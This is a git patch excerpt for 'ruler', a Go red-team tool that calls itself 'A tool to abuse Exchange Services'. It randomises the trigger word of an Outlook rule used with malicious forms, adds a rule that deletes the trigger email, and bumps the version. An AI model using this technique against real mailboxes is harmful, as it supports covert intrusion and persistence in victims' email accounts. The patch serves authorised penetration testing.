index fe6a35c..867bd74 100644
--- a/ruler.go
+++ b/ruler.go
@@ -513,14 +513,18 @@ func createForm(c *cli.Context) error {
 	if c.Bool("rule") == true {
 		rname := utils.GenerateString(6)
 		utils.Info.Printf("Rule trigger set. Adding new rule with name %s\n", rname)
-		triggerword := strings.Split(c.String("subject"), " ")[0]
+		triggerword := utils.GenerateString(8)
 		utils.Info.Printf("Adding new rule with trigger of %s\n", triggerword)
+		if c.Bool("send") == false {
+			utils.Info.Printf("Autosend disabled. You'll need to trigger the rule by sending an email with the keyword \"%s\" present in the subject. \n", triggerword)
+		}
 		//create delete rule
 		if _, err := mapi.ExecuteDeleteRuleAdd(rname, triggerword); err != nil {
 			utils.Error.Println("Failed to create the trigger rule")
 		} else {
 			utils.Info.Println("Trigger rule created.")
 		}
+		c.Set("subject", triggerword)
 	}
 
 	//trigger the email if the send option is enabled

From 8d172a12e8491646f80bbf482d451da87d52b32c Mon Sep 17 00:00:00 2001
From: Etienne Stalmans <etienne@sensepost.com>
Date: Wed, 3 May 2017 16:03:19 +0100
Subject: [PATCH 4/4] version number update

---
 ruler.go | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/ruler.go b/ruler.go
index 867bd74..e61623b 100644
--- a/ruler.go
+++ b/ruler.go
@@ -586,7 +586,7 @@ func main() {
 	app := cli.NewApp()
 	app.Name = "ruler"
 	app.Usage = "A tool to abuse Exchange Services"
-	app.Version = "2.1.0"
+	app.Version = "2.1.3"
 	app.Author = "Etienne Stalmans <etienne@sensepost.com>, @_staaldraad"
 	app.Description = `         _
  _ __ _   _| | ___ _ __